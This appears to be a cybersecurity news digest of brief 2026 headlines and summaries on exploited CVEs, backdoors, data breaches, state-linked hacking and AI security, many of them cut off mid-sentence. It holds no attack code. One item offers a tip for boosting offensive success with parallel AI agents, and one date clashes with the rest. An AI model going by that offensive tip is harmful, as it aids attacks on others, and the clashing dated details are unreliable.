Today's Cybersecurity Pulse
CISA adds critical Android and Linux flaws to KEV catalog
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) listed two high‑severity vulnerabilities in its Known Exploited Vulnerabilities catalog: Android CVE‑2025‑48595, an integer overflow that enables privilege escalation on Android 14‑16 without user interaction, patched in June 2026; and Linux CVE‑2022‑0492, a kernel flaw also deemed actively exploited.
Also developing:
By the numbers: Ingeteam secures $82.5M loan from EIB for renewable energy R&D
Secure Medical Image Cryptanalysis with Quantum Neural Networks for IoT-Enabled Cloud Storage
The paper introduces a unified security framework for IoT‑enabled medical imaging that blends hybrid post‑quantum encryption, a quantum neural network for cryptanalysis, federated deep learning, and secure cloud storage. The hybrid scheme merges post‑quantum cryptography, chaos‑based diffusion, and AES‑GCM, while the Federated Quantum Neural Cryptanalysis Network (FQNC‑Net) identifies attacks with high precision. Tested on KiTS19, KiTS21 and KiTS23 datasets, the system reaches 97.84% accuracy and a 98.12% attack‑detection rate, with cloud latency under one second and 99.92% integrity verification. The results demonstrate a viable path for privacy‑preserving, quantum‑resilient healthcare IoT deployments.
Goodwin and Cooley Earn Spot on Cybersecurity Docket’s Incident Response Elite 2026
Goodwin and Cooley secured placements on Cybersecurity Docket’s Incident Response Elite list for 2026, with three Goodwin partners and four Cooley partners recognized. The selections underscore the growing premium placed on data‑breach response capabilities across global law firms.
Ex-Orrick Partner Withdraws Data‑Breach Suit Hours After Filing
Joseph Casillas, a former Orrick Herrington & Sutcliffe employee, voluntarily dismissed his data‑breach lawsuit against the firm just hours after filing. The move leaves the case open for re‑filing in another venue and highlights the difficulty of pursuing negligence claims...
Phishing Attacks Surge, Spreading Anxiety Across All Channels
It’s hard to overstate the acceleration in frequency, cleverness and diversity of phishing and targeted exploits across every media channel over the past month or so. Have experienced it personally but also via friends and family, several of whom have...
KelpDAO Attack Timeline Discrepancy Challenges LayerZero Claim
Did something change between December of 2024 and now? Because unless I'm confused, this is saying that the attack on KelpDAO could not have happened as LayerZero described it.
Cyera to Acquire AI Data Startup Ryft in Deal Valued Up to $130 Million
Cyera, a data‑security company, announced the acquisition of Ryft, a two‑year‑old AI data startup, in a transaction valued at up to $130 million. The deal highlights the accelerating convergence of artificial‑intelligence capabilities with cybersecurity solutions.
Google Rolls Out Gemini Enterprise Agent Platform and 8th‑Gen TPUs, Backed by Up to $185 B AI Spend
Google announced the Gemini Enterprise Agent Platform at Cloud Next, pairing it with eighth‑generation TPU chips and a $175‑$185 billion AI capex plan for 2026. The suite targets autonomous workflow automation and security, promising faster threat detection and tighter governance for...
Indirect Prompt‑Injection Attacks Emerge as Top Threat to Enterprise LLMs
Security researchers have flagged indirect prompt‑injection attacks as the leading vulnerability for large language models (LLMs). The rise of enterprise AI tools such as Zeta Global’s Athena, built on OpenAI technology, amplifies the urgency for robust mitigation strategies.
‘AiFrame’ Browser Attacks Continue with Fake Authenticator, Converter Extensions
Six new malicious Chrome extensions tied to the AiFrame campaign have been uncovered, expanding the original set of 32 AI‑impersonating add‑ons. The extensions—including a fake two‑factor authenticator, an AI‑to‑PDF converter and a HEIC‑to‑JPG tool—have roughly 134,000 combined installs and request...
ADT Confirms Data Breach After ShinyHunters Leak Threat
ADT confirmed a data breach after the ShinyHunters extortion group threatened to expose stolen records. The company detected unauthorized access on April 20, 2024, and found that personal information—names, phone numbers, addresses, and in some cases dates of birth and the...
Iran Cyber Campaign Targets Critical Infrastructure’s Weakest Links
Operation Epic Fury marks Iran’s shift from espionage to disruptive cyber attacks on U.S. critical infrastructure. Iranian‑affiliated APT groups are actively exploiting internet‑facing programmable logic controllers in water, energy and government sectors, causing operational disruptions and financial loss. The campaign...
Some Brands Are Safe From The US' Foreign Router Ban, But No One Seems To Know Why
On March 23 2026 the FCC added foreign‑made consumer routers to its Covered List, effectively banning any new router not manufactured in the United States. Approximately 60 % of U.S. routers are sourced from China, so the rule sent shockwaves through the market....
Rev. 3 Is Coming – Start Preparing for the Next CMMC Requirement
The Department of Defense’s Cybersecurity Maturity Model Certification (CMMC) will soon require compliance with NIST SP 800‑171 Revision 3, which supersedes the current Rev 2 baseline. Rev 3, released in May 2024, adds three new control families—supply‑chain security, incident response, and advanced threats—while reducing the...
Firestarter Malware Survives Cisco Firewall Updates, Security Patches
U.S. and U.K. cyber agencies have identified a custom backdoor, Firestarter, that remains active on Cisco Firepower and ASA firewalls even after firmware updates and security patches. The malware exploits CVE‑2025‑20333 and CVE‑2025‑20362 to gain initial access, then uses the...
CMMC Won’t Fail on Controls. It Will Fail on Proof.
The Cybersecurity Maturity Model Certification (CMMC) is evolving from a checklist of controls to a verification regime that demands provable evidence. Contractors often have the right technical safeguards but lack the ability to produce continuous, defensible proof on demand. This...
ShinyHunters Claims Udemy Data Breach of 1.4M Users
ShinyHunters, a financially motivated threat group, alleges it has exfiltrated over 1.4 million Udemy user records and is demanding a ransom before a public leak. The claim surfaced on April 24, 2026, with a deadline of April 27 for Udemy to respond. While...
New ClickFix Attack Hides in Native Windows Tools to Reduce Detection Risk
CyberProof uncovered a new ClickFix campaign that tricks users into running malicious code via a fake CAPTCHA prompt. The attack leverages native Windows utilities cmdkey and regsvr32—known as LOLBins—to download a DLL from a remote server and register a scheduled...
Microsoft Fabric Roadshow Unveils 2026 Enhancements for Integration, Analytics and Governance
At a February 16 roadshow in Brisbane, Microsoft announced a suite of 2026 updates to its Fabric data platform, emphasizing tighter governance, new AI catalog features, and expanded support for migrating from Azure Data Factory and legacy tools. The enhancements...
UK and Global Agencies Warn China-Linked Hackers Exploit Everyday IoT Devices to Target Firms
The UK’s National Cyber Security Centre, together with agencies in nine other nations, warned that China‑backed hackers are turning ordinary IoT gear into covert botnets, with a single Chinese firm compromising roughly 200,000 devices worldwide. The advisory marks a shift...
AHA Urges Delay on TEFCA Individual Access SOP over Patient Privacy Concerns
The American Hospital Association (AHA) has urged the Sequoia Project to postpone the rollout of version 3.0 of the Trusted Exchange Framework and Common Agreement (TEFCA) Individual Access Services (IAS) Standard Operating Procedures, originally slated for August 2027. The AHA argues that...
Advisory Details Shifting Tactics of Chinese Cyber Actors Using Covert Networks for Malicious Activity
A joint advisory from U.S. and international cyber agencies warns that China‑aligned threat actors have shifted to large‑scale covert networks of compromised routers, IoT devices, and other edge hardware. These hidden botnets let attackers mask origins, evade defenses, and target...
Iran’s Cyber Threat May Be Less ‘Shock and Awe’ than ‘Low and Slow,’ Officials Say
After a CISA advisory warned of Iranian‑linked cyber actors targeting U.S. critical infrastructure, officials say the threat is more likely low‑and‑slow opportunistic intrusions than a shock‑and‑awe campaign. Former NSA director Tim Haugh and cyber‑security veteran Kevin Mandia note Iran’s tactics...
Shell Security Plugin
The new Shell Security plugin links OpenClaw’s built‑in security audit with KiloCode’s Security Advisor API, turning raw JSON findings into a prioritized, plain‑language remediation report delivered inside chat platforms like Slack or Telegram. It runs the audit locally, sends only...
IHS Leaders Tie Cybersecurity Directly to Patient Care
At the 2026 Splunk GovSummit, Indian Health Service leaders declared cybersecurity a core component of patient care. Serving 2.7 million patients across 37 states, IHS ties security to clinical continuity, emphasizing real‑time monitoring and resilience in remote and urban facilities. The...
Netherlands Weighs Data Sovereignty Concerns with Solvinity Digital Identity Contract
The Dutch House of Representatives voted to block an extension of the DigiD contract with Solvinity if the company is acquired by U.S. IT services firm Kyndryl. Lawmakers cite data sovereignty and national security concerns, fearing U.S. jurisdiction could expose...
ADT Says Customer Data Stolen in Cyber Intrusion
ADT disclosed a cyber intrusion that stole personal data—including names, addresses, dates of birth and the last four digits of Social Security numbers and tax IDs—from customers and prospects. The ShinyHunters group claimed to have taken 10 million records and threatened...
LPL Claims Hackers Accessed Client Accounts Through Advisors’ Devices
LPL Financial disclosed a cybersecurity breach that compromised advisor devices on November 10, 2025, affecting 1,581 client accounts. Malware delivered via phishing gave hackers unauthorized access to the firm’s web‑based advisor portal, leading to illicit securities trades and financial transfers. LPL halted...
Delivering an Impactful 15-Minute Board Briefing
Cyber risk oversight has shifted to audit committees, now covering 79% of S&P 500 firms, up from 71.2% two years earlier. Board briefings are limited to 10‑15 minutes each quarter, forcing CISOs to move from data‑heavy dashboards to concise, business‑focused narratives....
Four Cooley Partners Honored Among Elite in Data Breach Response
Four Cooley partners—Travis LeBlanc, Patrick Van Eecke, Guadalupe Sampedro and Kristen Mathews—were named to Cybersecurity Docket’s Incident Response Elite for 2026, a global list that spotlights top data‑breach response lawyers. LeBlanc earned his ninth appearance, Van Eecke his third, Sampedro...
EU Business Lobby Backs Digital Wallet Plan, Calls for Proportionate Identity Rules
Europe’s leading business lobby, BusinessEurope, has endorsed the European Business Wallet (EBW) proposal, highlighting its potential to cut red tape and streamline compliance across tax, AML and corporate reporting. The group stresses that digital identity verification must be proportionate, low‑cost...
New BlackFile Extortion Group Linked to Surge of Vishing Attacks
A new financially motivated hacking group called BlackFile, also known as CL‑CRI‑1116, UNC6671 and Cordial Spider, has been linked to a wave of vishing‑based credential theft and extortion targeting retail and hospitality firms since February 2026. The attackers impersonate IT...
DeFi Must Harden Infrastructure and Adopt Transparent Governance
Takeaways from Kelp crsisis so far: 1. DeFi needs to be military-grade finance -- it has state actors going after it and the infrastructure better be strong enough to fight this enemy. right now, it's not. Stop using centralized infra, with...
CISA Last in Line for Access to Anthropic Mythos
Anthropic’s Claude Mythos, a bug‑hunting AI model, is being rolled out through a tightly controlled initiative called Project Glasswing. While the NSA and the Department of Commerce have received access, the Cybersecurity and Infrastructure Security Agency (CISA) remains excluded. Bloomberg...
Microsoft to Roll Out Entra Passkeys on Windows in Late April
Microsoft announced that Entra passkey support will roll out to Windows devices starting in late April 2026, with general availability slated for mid‑June. The feature extends phishing‑resistant, passwordless authentication to corporate, personal and shared Windows machines, even when they are...
The Router on the Shelf Is Now a National Security Problem
A twelve‑agency joint advisory released on April 23 warns that China‑linked groups are weaponizing compromised home and small‑office routers, IoT gear, and smart devices at industrial scale. The advisory, co‑authored by CISA, the FBI, the DoD Cyber Crime Center and...
New ‘Pack2TheRoot’ Flaw Gives Hackers Root Linux Access
A new vulnerability called Pack2TheRoot (CVE‑2026‑41651) in the PackageKit daemon allows local users to gain root privileges by installing or removing system packages. The flaw, rated 8.8/10, has existed since 2014 across PackageKit versions 1.0.2‑1.3.4 and impacts major Linux distributions...
AI-Generated Code Is Vulnerable
Researchers at Georgia Tech's Systems Software & Security Lab have unveiled the Vibe Security Radar, a tool that scans public vulnerability databases to identify code defects introduced by generative AI tools such as Claude, Gemini, and GitHub Copilot. The radar...
FIRESTARTER Backdoor Hit Federal Cisco Firepower Device, Survives Security Patches
U.S. CISA disclosed that a federal agency’s Cisco Firepower appliance was compromised in September 2025 by a new backdoor malware dubbed FIRESTARTER. The implant leverages two recently patched CVEs (2025‑20333, 2025‑20362) to gain root access and persists through firmware updates...
China Now as Good as U.S. at Offensive Cyber: Dutch Intelligence
Dutch intelligence agencies warned that China’s offensive cyber capability now matches that of the United States. The AIVD’s annual report highlighted a sophisticated Chinese national program that evades detection, with only a tiny fraction of attacks being identified. Similar capabilities...
AI Tools Empower Cybercriminals to Steal Money and Data
AI tools are making it easier than ever for online criminals to trick people and steal money and valuable confidential data.
How CrowdStrike Is Helping The Industry To Withstand AI-Driven Vulnerability Deluge: Exec
Cybersecurity leader CrowdStrike unveiled Project QuiltWorks, an initiative that merges its Falcon Spotlight platform with multiple frontier AI models to accelerate vulnerability discovery and remediation. Prompted by Anthropic’s Claude Mythos disclosure, the program aims to pre‑empt AI‑driven exploit spikes by...
Vulnerability Economics 2026: Deep Insights and Future Outlook
One of my favorite humans talking about one of my favorite topics: Mark Dowd goes deep into what vulnerability economics looks like in 2026, and where he thinks it goes from here. In true TBP-style it's long (2h) but it's...
Parallel AI Agents and Result Aggregation Boost Offensive Success
Sometimes success of using AI agents for offense is using them in multiple or parallel rounds. With different models. And aggregating the results.
FCA Publishes Cyber Co-Ordination Group Insights
On 24 April 2026 the UK Financial Conduct Authority released insights from its 2025 Cyber Coordination Group, which convenes up to 140 financial firms to share best practices on cyber resilience. The FCA emphasized senior‑level involvement in incident‑response drills, live‑environment testing, and...
New Wiper Links Venezuela Oil Firm to December Hack
Mystery around Venezuelan cyberattack deepens with new discovery of "highly destructive" wiper. Hard-coded into the wiper was the domain for Venezuela's state-run oil company, suggesting the wiper may have been used in December's attack against company https://t.co/v0gHlATx4w
Microsoft Now Lets You Pause Windows Updates Indefinitely
Microsoft will let you pause Windows Updates indefinitely, 35 days at a time. This is a good change, and it makes sense security wise that Microsoft wouldn’t let you totally disable updates https://t.co/rs0FWzHBtZ
AI Agents Are Already Inside Your Digital Infrastructure
A new Cloud Security Alliance report finds that 82% of enterprises host unknown AI agents and nearly two‑thirds have suffered AI‑agent‑related incidents in the last year, creating a growing "retirement debt" of lingering permissions. The surge in autonomous agents is...
GitHub Actions Less Secure Than Private Lambda Deployments
Hardening GitHub Actions: Lessons from Recent Attacks | Wiz Blog ~ really good article but I wrote about why I won’t use GitHub actions at all on a cloud instance. Not as many protections as you can get with Lambda...
Common Insecure Default Becomes De Facto Standard
What I found sharp in this segment: @TuongvyLe12's point that when 47% of teams choose the same insecure default, it stops being an individual choice and starts looking like industry standard architecture. @kkirkbos @DEXintheCityPod https://t.co/dgATW3fh8c
Cirrascale to Offer On-Prem Google Gemini Models
Cirrascale Cloud Services will deliver Google Gemini large‑language models on‑premise through Google Distributed Cloud, using Dell‑built appliances equipped with Intel CPUs and Nvidia GPUs. The offering supports fully air‑gapped or connected deployments, letting government, defense, finance, healthcare and education customers...